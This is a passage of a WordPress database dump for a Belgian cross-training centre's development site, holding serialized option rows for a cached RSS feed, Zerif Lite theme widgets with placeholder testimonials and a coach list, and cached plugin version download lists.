tribs\";a:1:{s:0:\"\";a:3:{s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";s:4:\"href\";s:48:\"http://feeds.feedburner.com/WordpressFrancophone\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:3:\"rel\";s:3:\"hub\";s:4:\"href\";s:32:\"http://pubsubhubbub.appspot.com/\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:4:{s:4:\"info\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:3:\"uri\";s:20:\"wordpressfrancophone\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:14:\"emailServiceId\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordpressFrancophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:18:\"feedburnerHostname\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://feedburner.google.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"feedFlare\";a:9:{i:0;a:5:{s:4:\"data\";s:24:\"Subscribe with NewsGator\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:112:\"http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:42:\"http://www.newsgator.com/images/ngsub1.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:24:\"Subscribe with Bloglines\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:77:\"http://www.bloglines.com/sub/http://feeds.feedburner.com/WordpressFrancophone\";s:3:\"src\";s:48:\"http://www.bloglines.com/images/sub_modern11.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:23:\"Subscribe with Netvibes\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:98:\"http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:39:\"//www.netvibes.com/img/add2netvibes.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:21:\"Subscribe with Google\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:93:\"http://fusion.google.com/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:51:\"http://buttons.googlesyndication.com/fusion/add.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:25:\"Subscribe with Pageflakes\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:101:\"http://www.pageflakes.com/subscribe.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:87:\"http://www.pageflakes.com/ImageFile.ashx?instanceId=Static_4&fileName=ATP_blu_91x17.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:21:\"Subscribe with Plusmo\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:86:\"http://www.plusmo.com/add?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:43:\"http://plusmo.com/res/graphics/fbplusmo.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:23:\"Subscribe with Live.com\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:81:\"http://www.live.com/?add=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:141:\"http://tkfiles.storage.msn.com/x1piYkpqHC_35nIp1gLE68-wvzLZO8iXl_JMledmJQXP-XTBOLfmQv4zhj4MhcWEJh_GtoBIiAl1Mjh-ndp9k47If7hTaFno0mxW9_i3p_5qQw\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:25:\"Subscribe with Mon Yahoo!\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:99:\"https://add.my.yahoo.com/content?lg=fr&url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:60:\"http://us.i1.yimg.com/us.yimg.com/i/us/my/bn/intatm_fr_1.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:8;a:5:{s:4:\"data\";s:25:\"Subscribe with Excite MIX\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:89:\"http://mix.excite.eu/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:42:\"http://image.excite.co.uk/mix/addtomix.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:52:\"http://backend.userland.com/creativeCommonsRssModule\";a:1:{s:7:\"license\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://creativecommons.org/licenses/by-nc-sa/3.0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:10:{s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"etag\";s:27:\"8lK3oN/IDelQBjywvDhMWp9vNFM\";s:13:\"last-modified\";s:29:\"Sun, 30 Dec 2018 12:00:19 GMT\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"date\";s:29:\"Sun, 30 Dec 2018 12:04:36 GMT\";s:7:\"expires\";s:29:\"Sun, 30 Dec 2018 12:04:36 GMT\";s:13:\"cache-control\";s:18:\"private, max-age=0\";s:22:\"x-content-type-options\";s:7:\"nosniff\";s:16:\"x-xss-protection\";s:13:\"1; mode=block\";s:6:\"server\";s:3:\"GSE\";}}s:5:\"build\";s:14:\"20180902130703\";}', 'no'),
(151, 'zerif_time_activated', '1535895145', 'yes'),
(169, 'widget_pirate_forms_contact_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(170, 'pirate_forms_install', '1535895178', 'yes');
INSERT INTO `ct_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(158, 'widget_zerif_testim-widget', 'a:4:{i:1;a:3:{s:5:\"title\";s:10:\"Dana Lorem\";s:4:\"text\";s:242:\"Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Curabitur nec sem vel sapien venenatis mattis non vitae augue. Nullam congue commodo lorem vitae facilisis. Suspendisse malesuada id turpis interdum dictum.\";s:9:\"image_uri\";s:86:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/testimonial1.jpg\";}i:2;a:3:{s:5:\"title\";s:13:\"Linda Guthrie\";s:4:\"text\";s:242:\"Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Curabitur nec sem vel sapien venenatis mattis non vitae augue. Nullam congue commodo lorem vitae facilisis. Suspendisse malesuada id turpis interdum dictum.\";s:9:\"image_uri\";s:86:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/testimonial2.jpg\";}i:3;a:3:{s:5:\"title\";s:13:\"Cynthia Henry\";s:4:\"text\";s:242:\"Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Curabitur nec sem vel sapien venenatis mattis non vitae augue. Nullam congue commodo lorem vitae facilisis. Suspendisse malesuada id turpis interdum dictum.\";s:9:\"image_uri\";s:86:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/testimonial3.jpg\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(159, 'widget_zerif_team-widget', 'a:5:{i:1;a:12:{s:4:\"name\";s:15:\"Damien Pierrard\";s:8:\"position\";s:48:\"Administrateur asbl - Coach Cross Training Namur\";s:11:\"description\";s:0:\"\";s:7:\"fb_link\";s:0:\"\";s:7:\"tw_link\";s:0:\"\";s:7:\"bh_link\";s:0:\"\";s:7:\"db_link\";s:0:\"\";s:7:\"ln_link\";s:0:\"\";s:9:\"image_uri\";s:79:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/team1.png\";s:15:\"open_new_window\";s:0:\"\";s:15:\"custom_media_id\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";}i:2;a:12:{s:4:\"name\";s:16:\"Julien Lallemant\";s:8:\"position\";s:26:\"Coach Cross Training Namur\";s:11:\"description\";s:0:\"\";s:7:\"fb_link\";s:0:\"\";s:7:\"tw_link\";s:0:\"\";s:7:\"bh_link\";s:0:\"\";s:7:\"db_link\";s:0:\"\";s:7:\"ln_link\";s:0:\"\";s:9:\"image_uri\";s:79:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/team2.png\";s:15:\"open_new_window\";s:0:\"\";s:15:\"custom_media_id\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";}i:3;a:12:{s:4:\"name\";s:12:\"Honnay Marie\";s:8:\"position\";s:46:\" Coach Cross Training Namur et Dietéticienne \";s:11:\"description\";s:0:\"\";s:7:\"fb_link\";s:0:\"\";s:7:\"tw_link\";s:0:\"\";s:7:\"bh_link\";s:0:\"\";s:7:\"db_link\";s:0:\"\";s:7:\"ln_link\";s:0:\"\";s:9:\"image_uri\";s:79:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/team3.png\";s:15:\"open_new_window\";s:0:\"\";s:15:\"custom_media_id\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";}i:4;a:12:{s:4:\"name\";s:13:\"Javaux Pierre\";s:8:\"position\";s:27:\" Coach Cross Training Namur\";s:11:\"description\";s:0:\"\";s:7:\"fb_link\";s:0:\"\";s:7:\"tw_link\";s:0:\"\";s:7:\"bh_link\";s:0:\"\";s:7:\"db_link\";s:0:\"\";s:7:\"ln_link\";s:0:\"\";s:9:\"image_uri\";s:79:\"http://dev.crosstrainingcenter.be/wp-content/themes/zerif-lite/images/team4.png\";s:15:\"open_new_window\";s:0:\"\";s:15:\"custom_media_id\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(206, '_transient_timeout_pirate_forms_244versions', '1548763470', 'no'),
(190, '_transient_is_multi_author', '0', 'yes'),
(160, 'widget_zerif_clients-widget', 'a:6:{i:1;a:4:{s:4:\"link\";s:0:\"\";s:9:\"image_uri\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";s:15:\"custom_media_id\";s:0:\"\";}i:2;a:4:{s:4:\"link\";s:0:\"\";s:9:\"image_uri\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";s:15:\"custom_media_id\";s:0:\"\";}i:3;a:4:{s:4:\"link\";s:0:\"\";s:9:\"image_uri\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";s:15:\"custom_media_id\";s:0:\"\";}i:4;a:4:{s:4:\"link\";s:0:\"\";s:9:\"image_uri\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";s:15:\"custom_media_id\";s:0:\"\";}i:5;a:4:{s:4:\"link\";s:0:\"\";s:9:\"image_uri\";s:0:\"\";s:19:\"image_in_customizer\";s:0:\"\";s:15:\"custom_media_id\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(161, 'themeisle_companion_flag', 'installed', 'yes'),
(162, 'themeisle_companion_install', '1535895168', 'yes'),
(207, '_transient_pirate_forms_244versions', 'a:42:{i:0;a:2:{s:7:\"version\";s:6:\"1.0.10\";s:3:\"url\";s:62:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.10.zip\";}i:1;a:2:{s:7:\"version\";s:6:\"1.0.12\";s:3:\"url\";s:62:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.12.zip\";}i:2;a:2:{s:7:\"version\";s:6:\"1.0.13\";s:3:\"url\";s:62:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.13.zip\";}i:3;a:2:{s:7:\"version\";s:6:\"1.0.14\";s:3:\"url\";s:62:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.14.zip\";}i:4;a:2:{s:7:\"version\";s:6:\"1.0.15\";s:3:\"url\";s:62:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.15.zip\";}i:5;a:2:{s:7:\"version\";s:6:\"1.0.16\";s:3:\"url\";s:62:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.16.zip\";}i:6;a:2:{s:7:\"version\";s:6:\"1.0.17\";s:3:\"url\";s:62:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.17.zip\";}i:7;a:2:{s:7:\"version\";s:6:\"1.0.18\";s:3:\"url\";s:62:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.18.zip\";}i:8;a:2:{s:7:\"version\";s:5:\"1.0.3\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.3.zip\";}i:9;a:2:{s:7:\"version\";s:5:\"1.0.4\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.4.zip\";}i:10;a:2:{s:7:\"version\";s:5:\"1.0.5\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.5.zip\";}i:11;a:2:{s:7:\"version\";s:5:\"1.0.6\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.6.zip\";}i:12;a:2:{s:7:\"version\";s:5:\"1.0.7\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.0.7.zip\";}i:13;a:2:{s:7:\"version\";s:5:\"1.1.3\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.1.3.zip\";}i:14;a:2:{s:7:\"version\";s:5:\"1.2.0\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.2.0.zip\";}i:15;a:2:{s:7:\"version\";s:5:\"1.2.1\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.2.1.zip\";}i:16;a:2:{s:7:\"version\";s:5:\"1.2.2\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.2.2.zip\";}i:17;a:2:{s:7:\"version\";s:5:\"1.2.5\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.1.2.5.zip\";}i:18;a:2:{s:7:\"version\";s:5:\"2.0.0\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.0.0.zip\";}i:19;a:2:{s:7:\"version\";s:5:\"2.0.1\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.0.1.zip\";}i:20;a:2:{s:7:\"version\";s:5:\"2.0.2\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.0.2.zip\";}i:21;a:2:{s:7:\"version\";s:5:\"2.0.3\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.0.3.zip\";}i:22;a:2:{s:7:\"version\";s:5:\"2.0.4\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.0.4.zip\";}i:23;a:2:{s:7:\"version\";s:5:\"2.0.5\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.0.5.zip\";}i:24;a:2:{s:7:\"version\";s:5:\"2.1.0\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.1.0.zip\";}i:25;a:2:{s:7:\"version\";s:5:\"2.2.0\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.2.0.zip\";}i:26;a:2:{s:7:\"version\";s:5:\"2.2.1\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.2.1.zip\";}i:27;a:2:{s:7:\"version\";s:5:\"2.2.2\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.2.2.zip\";}i:28;a:2:{s:7:\"version\";s:5:\"2.2.3\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.2.3.zip\";}i:29;a:2:{s:7:\"version\";s:5:\"2.2.4\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.2.4.zip\";}i:30;a:2:{s:7:\"version\";s:5:\"2.2.5\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.2.5.zip\";}i:31;a:2:{s:7:\"version\";s:5:\"2.3.0\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.3.0.zip\";}i:32;a:2:{s:7:\"version\";s:5:\"2.3.1\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.3.1.zip\";}i:33;a:2:{s:7:\"version\";s:5:\"2.3.2\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.3.2.zip\";}i:34;a:2:{s:7:\"version\";s:5:\"2.3.3\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.3.3.zip\";}i:35;a:2:{s:7:\"version\";s:5:\"2.3.4\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.3.4.zip\";}i:36;a:2:{s:7:\"version\";s:5:\"2.3.5\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.3.5.zip\";}i:37;a:2:{s:7:\"version\";s:5:\"2.4.0\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.4.0.zip\";}i:38;a:2:{s:7:\"version\";s:5:\"2.4.1\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.4.1.zip\";}i:39;a:2:{s:7:\"version\";s:5:\"2.4.2\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.4.2.zip\";}i:40;a:2:{s:7:\"version\";s:5:\"2.4.3\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.4.3.zip\";}i:41;a:2:{s:7:\"version\";s:5:\"2.4.4\";s:3:\"url\";s:61:\"https://downloads.wordpress.org/plugin/pirate-forms.2.4.4.zip\";}}', 'no'),
(208, '_transient_timeout_themeisle_companion_257versions', '1548763471', 'no'),
(209, '_transient_themeisle_companion_257versions', 'a:59:{i:0;a:2:{s:7:\"version\";s:5:\"1.0.0\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.1.0.0.zip\";}i:1;a:2:{s:7:\"version\";s:5:\"1.0.1\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.1.0.1.zip\";}i:2;a:2:{s:7:\"version\";s:5:\"1.0.2\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.1.0.2.zip\";}i:3;a:2:{s:7:\"version\";s:5:\"1.0.3\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.1.0.3.zip\";}i:4;a:2:{s:7:\"version\";s:5:\"1.0.4\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.1.0.4.zip\";}i:5;a:2:{s:7:\"version\";s:5:\"1.0.5\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.1.0.5.zip\";}i:6;a:2:{s:7:\"version\";s:5:\"2.0.0\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.0.zip\";}i:7;a:2:{s:7:\"version\";s:5:\"2.0.1\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.1.zip\";}i:8;a:2:{s:7:\"version\";s:6:\"2.0.10\";s:3:\"url\";s:69:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.10.zip\";}i:9;a:2:{s:7:\"version\";s:6:\"2.0.11\";s:3:\"url\";s:69:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.11.zip\";}i:10;a:2:{s:7:\"version\";s:5:\"2.0.2\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.2.zip\";}i:11;a:2:{s:7:\"version\";s:5:\"2.0.3\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.3.zip\";}i:12;a:2:{s:7:\"version\";s:5:\"2.0.4\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.4.zip\";}i:13;a:2:{s:7:\"version\";s:5:\"2.0.5\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.5.zip\";}i:14;a:2:{s:7:\"version\";s:5:\"2.0.6\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.6.zip\";}i:15;a:2:{s:7:\"version\";s:5:\"2.0.7\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.7.zip\";}i:16;a:2:{s:7:\"version\";s:5:\"2.0.8\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.8.zip\";}i:17;a:2:{s:7:\"version\";s:5:\"2.0.9\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.0.9.zip\";}i:18;a:2:{s:7:\"version\";s:5:\"2.1.0\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.1.0.zip\";}i:19;a:2:{s:7:\"version\";s:5:\"2.1.1\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.1.1.zip\";}i:20;a:2:{s:7:\"version\";s:5:\"2.2.0\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.2.0.zip\";}i:21;a:2:{s:7:\"version\";s:5:\"2.2.1\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.2.1.zip\";}i:22;a:2:{s:7:\"version\";s:5:\"2.2.2\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.2.2.zip\";}i:23;a:2:{s:7:\"version\";s:5:\"2.2.3\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.2.3.zip\";}i:24;a:2:{s:7:\"version\";s:5:\"2.2.4\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.2.4.zip\";}i:25;a:2:{s:7:\"version\";s:5:\"2.2.5\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.2.5.zip\";}i:26;a:2:{s:7:\"version\";s:5:\"2.2.6\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.2.6.zip\";}i:27;a:2:{s:7:\"version\";s:5:\"2.2.7\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.2.7.zip\";}i:28;a:2:{s:7:\"version\";s:5:\"2.3.0\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.3.0.zip\";}i:29;a:2:{s:7:\"version\";s:5:\"2.3.1\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.3.1.zip\";}i:30;a:2:{s:7:\"version\";s:5:\"2.3.2\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.3.2.zip\";}i:31;a:2:{s:7:\"version\";s:5:\"2.3.3\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.3.3.zip\";}i:32;a:2:{s:7:\"version\";s:5:\"2.3.4\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.3.4.zip\";}i:33;a:2:{s:7:\"version\";s:5:\"2.4.0\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.4.0.zip\";}i:34;a:2:{s:7:\"version\";s:5:\"2.4.1\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.4.1.zip\";}i:35;a:2:{s:7:\"version\";s:5:\"2.4.2\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.4.2.zip\";}i:36;a:2:{s:7:\"version\";s:5:\"2.4.3\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.4.3.zip\";}i:37;a:2:{s:7:\"version\";s:5:\"2.4.4\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.4.4.zip\";}i:38;a:2:{s:7:\"version\";s:5:\"2.4.5\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.4.5.zip\";}i:39;a:2:{s:7:\"version\";s:5:\"2.4.6\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.4.6.zip\";}i:40;a:2:{s:7:\"version\";s:5:\"2.4.7\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.4.7.zip\";}i:41;a:2:{s:7:\"version\";s:5:\"2.5.0\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.5.0.zip\";}i:42;a:2:{s:7:\"version\";s:5:\"2.5.1\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.5.1.zip\";}i:43;a:2:{s:7:\"version\";s:5:\"2.5.2\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.5.2.zip\";}i:44;a:2:{s:7:\"version\";s:5:\"2.5.3\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.5.3.zip\";}i:45;a:2:{s:7:\"version\";s:5:\"2.5.4\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.5.4.zip\";}i:46;a:2:{s:7:\"version\";s:5:\"2.5.5\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.5.5.zip\";}i:47;a:2:{s:7:\"version\";s:5:\"2.5.6\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.5.6.zip\";}i:48;a:2:{s:7:\"version\";s:5:\"2.5.7\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.5.7.zip\";}i:49;a:2:{s:7:\"version\";s:5:\"2.5.8\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.5.8.zip\";}i:50;a:2:{s:7:\"version\";s:5:\"2.6.0\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.6.0.zip\";}i:51;a:2:{s:7:\"version\";s:5:\"2.6.1\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.6.1.zip\";}i:52;a:2:{s:7:\"version\";s:5:\"2.6.2\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.6.2.zip\";}i:53;a:2:{s:7:\"version\";s:5:\"2.6.3\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.6.3.zip\";}i:54;a:2:{s:7:\"version\";s:5:\"2.6.4\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.6.4.zip\";}i:55;a:2:{s:7:\"version\";s:5:\"2.7.0\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.7.0.zip\";}i:56;a:2:{s:7:\"version\";s:5:\"2.7.1\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.7.1.zip\";}i:57;a:2:{s:7:\"version\";s:5:\"2.7.2\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.7.2.zip\";}i:58;a:2:{s:7:\"version\";s:5:\"2.7.3\";s:3:\"url\";s:68:\"https://downloads.wordpress.org/plugin/themeisle-companion.2.7.3.zip\";}}', 'no'),
